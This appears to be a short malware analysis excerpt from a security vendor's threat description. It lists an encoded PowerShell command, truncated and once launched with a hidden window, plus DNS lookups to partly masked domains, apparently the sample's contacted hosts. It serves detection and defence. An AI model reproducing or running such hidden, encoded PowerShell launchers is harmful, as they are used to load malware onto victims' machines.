Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABSAGkAawBjAGwAZABzAHcAbABsAD0AJwBNAGkAcQBhAHEAaQBlAHYAdQAnADsAJABWAGUAagB3AGoAagBvAGcAcAB6AHQAaQAgAD...
- DNS ASK ji##u89.com
- DNS ASK co###ech.com
- DNS ASK nk###pon.com
- DNS ASK ma###pcraft.com
- DNS ASK ma#####icsolutions.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABSAGkAawBjAGwAZABzAHcAbABsAD0AJwBNAGkAcQBhAHEAaQBlAHYAdQAnADsAJABWAGUAagB3AGoAagBvAGcAcAB6AHQAaQAgAD...' (with hidden window)